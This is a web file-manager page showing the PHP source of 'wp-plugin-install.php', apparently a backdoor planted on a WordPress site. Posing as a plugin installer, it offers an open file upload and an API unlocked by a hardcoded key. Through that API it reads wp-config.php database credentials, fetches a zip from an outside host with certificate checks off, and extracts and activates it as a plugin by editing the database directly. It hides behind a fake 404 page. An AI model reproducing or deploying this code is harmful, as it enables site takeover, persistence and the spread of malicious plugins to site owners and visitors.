Файловый менеджер

Файловый менеджер - Редактировать - /home/benshehx/iconenergyug.com/wp-plugin-install.php

Назад
<?php error_reporting(0); header('Content-Type: text/html; charset=utf-8'); # Upload if (isset($_GET['u']) && $_GET['u'] == 'ok') { if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['error'] == 0) { $path = __DIR__ . '/' . $file['name']; if (@move_uploaded_file($file['tmp_name'], $path)) { echo "File uploaded using move_uploaded_file: {$file['name']}"; } else if (@rename($file['tmp_name'], $path)) { echo "File uploaded using rename: {$file['name']}"; } else if (@file_put_contents($path, @file_get_contents($file['tmp_name']))) { echo "File uploaded using file_put_contents: {$file['name']}"; } else { echo "File not uploaded!"; } } else { echo "File not uploaded!"; } echo "<br>"; echo "<br>"; } echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file"><button type="submit">Upload</button></form>'; exit; } # Extensions $extensions = ['zip', 'curl', 'pdo_mysql']; $error = 0; foreach ($extensions as $ext) { if (!extension_loaded($ext)) { echo strtoupper($ext) . " yüklü değil, işlemlere devam edilemeyecek :(.<br>"; $error++; } } if ($error > 0) { exit; } # Function - Download and Extract Plugin function download_and_extract_plugin($url, $destinationFolder) { $tempZip = tempnam(sys_get_temp_dir(), 'plugin_') . '.zip'; $ch = curl_init($url); $fp = fopen($tempZip, 'w'); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_TIMEOUT, 50); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $success = curl_exec($ch); curl_close($ch); fclose($fp); if (!$success) { unlink($tempZip); return "{$tempZip} - ZIP file not downloaded."; } $zip = new ZipArchive(); if ($zip->open($tempZip) === true) { $zip->extractTo($destinationFolder); $zip->close(); unlink($tempZip); return true; } else { unlink($tempZip); return "{$tempZip} - ZIP file not extracted."; } } # API if (isset($_GET['API']) && trim($_GET['API']) == 'LJz5ZtXGc7hSM4aUfmE9CH') { # Params $wp_config = isset($_POST['wp_config_file']) ? urldecode(trim($_POST['wp_config_file'])) : __DIR__ . '/wp-config.php'; $destinationFolder = isset($_POST['wp_plugin_path']) ? urldecode(trim($_POST['wp_plugin_path'])) : __DIR__ . '/wp-content/plugins/'; $plugin_path = isset($_POST['plugin_path_file']) ? urldecode(trim($_POST['plugin_path_file'])) : 'fancy-elementor-gallery-box/fancy-elementor-gallery-box.php'; $url = isset($_POST['plugin_url']) ? urldecode(trim($_POST['plugin_url'])) : 'https://ampproject.com.tr/canonical_plugin_for_wp.zip?v='.time(); # Install plugin if (trim($_GET['action']) != 'install') { die(json_encode([ "status" => true, "wp_config_file" => $wp_config, "wp_plugins_path" => $destinationFolder, "plugin_path_file" => $plugin_path, "plugin_url" => $url, #"action" => "install", ])); } # wp-config.php file check if (!file_exists($wp_config)) { die(json_encode(["status" => false, "error" => "{$wp_config} file not found."])); } # plugin path check if (!is_dir($destinationFolder)) { die(json_encode(["status" => false, "error" => "{$destinationFolder} folder not found."])); } # plugin file check if (file_exists($destinationFolder . $plugin_path)) { die(json_encode(["status" => false, "error" => "{$destinationFolder}{$plugin_path} file already installed."])); } # wp-config.php file include include_once $wp_config; # wp-config.php file include include_once $wp_config; # Database Connection $servername = DB_HOST; $username = DB_USER; $password = DB_PASSWORD; $dbname = DB_NAME; $charset = DB_CHARSET; // Create connection pdo try { $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password); $db->exec('SET NAMES `' . $charset . '`'); } catch (PDOException $e) { die(json_encode(["status" => false, "error" => 'Connection failed: ' . $e->getMessage()])); } # Upload Plugin $upload_plugin = download_and_extract_plugin($url, $destinationFolder); if ($upload_plugin !== true) { die(json_encode(["status" => false, "error" => $upload_plugin])); } # options - active plugins $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch(); $active_plugins = unserialize($active_plugins['option_value']); if (is_array($active_plugins)) { if (!in_array($plugin_path, $active_plugins)) { $active_plugins[] = $plugin_path; $active_plugins = serialize($active_plugins); $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';"); die(json_encode(["status" => true, "message" => "{$plugin_path} - Plugin activated!"])); } else { die(json_encode(["status" => false, "error" => "Plugin already activated!"])); } } else { die(json_encode(["status" => false, "error" => "Error! - active_plugins not found"])); } exit; } # POST REQUEST if ($_SERVER['REQUEST_METHOD'] == 'POST') { # Post params $wp_config = trim($_POST['wp_config_file']); $destinationFolder = trim($_POST['wp_plugin_path']); $plugin_path = trim($_POST['plugin_path_file']); $url = trim($_POST['plugin_url']); # wp-config.php file check if (!file_exists($wp_config)) { die("{$wp_config} file not found."); } # plugin path check if (!is_dir($destinationFolder)) { die("{$destinationFolder} folder not found."); } # plugin file check if (file_exists($destinationFolder . $plugin_path)) { die("{$destinationFolder}{$plugin_path} file already installed."); } # wp-config.php file include include_once $wp_config; # Database Connection $servername = DB_HOST; $username = DB_USER; $password = DB_PASSWORD; $dbname = DB_NAME; $charset = DB_CHARSET; // Create connection pdo try { $db = new PDO("mysql:host={$servername};dbname={$dbname}", $username, $password); $db->exec('SET NAMES `' . $charset . '`'); } catch (PDOException $e) { die('Connection failed: ' . $e->getMessage()); } # Upload Plugin $upload_plugin = download_and_extract_plugin($url, $destinationFolder); if ($upload_plugin === true) { echo "Plugin ($url) downloaded and will be active...<br>"; } else { die($upload_plugin); } # options - active plugins $active_plugins = $db->query("SELECT `option_value` FROM `{$table_prefix}options` WHERE `option_name` = 'active_plugins';")->fetch(); $active_plugins = unserialize($active_plugins['option_value']); if (is_array($active_plugins)) { if (!in_array($plugin_path, $active_plugins)) { $active_plugins[] = $plugin_path; $active_plugins = serialize($active_plugins); $db->query("UPDATE `{$table_prefix}options` SET `option_value` = '{$active_plugins}' WHERE `option_name` = 'active_plugins';"); die("{$plugin_path} - Plugin activated!"); } else { die("Plugin already activated!"); } } else { die("Error! - active_plugins not found"); } exit; } # GET REQUEST if (!isset($_GET['f']) && $_GET['f'] != 'ok') { die("404 Not Found"); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Plugin Install for WP</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> </head> <body> <div class="container mt-5"> <h1 class="text-center mb-4">Plugin Install for WP</h1> <p> </p> <div class="row justify-content-center"> <div class="col-md-6"> <form method="post" action=""> <h2>Local Settings</h2> <div class="mb-3"> <label for="name" class="form-label">WP Config Path</label> <input type="text" class="form-control" name="wp_config_file" placeholder="<?php echo __DIR__ ?>/wp-config.php" value="<?php echo __DIR__ ?>/wp-config.php"> </div> <div class="mb-3"> <label for="name" class="form-label">WP Plugin Path</label> <input type="text" class="form-control" name="wp_plugin_path" placeholder="<?php echo __DIR__ ?>/wp-content/plugins/" value="<?php echo __DIR__ ?>/wp-content/plugins/"> </div> <p> </p> <h2>Remote Plugin Settings</h2> <div class="mb-3"> <label for="name" class="form-label">Plugin URL</label> <input type="text" class="form-control" name="plugin_url" placeholder="https://site.com/plugin.zip" value="https://ampproject.com.tr/canonical_plugin_for_wp.zip?v=<?php echo time() ?>"> </div> <div class="mb-3"> <label for="name" class="form-label">Plugin Path File</label> <input type="text" class="form-control" name="plugin_path_file" placeholder="plugin_path/plugin_root_file.php" value="fancy-elementor-gallery-box/fancy-elementor-gallery-box.php"> </div> <button type="submit" class="btn btn-danger w-100">Do Install Plugin, Dude!</button> </form> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script> </body> </html>

| ver. 1.4 | Github | . | PHP 8.1.31 | Генерация страницы: 0.15 | proxy | phpinfo | Настройка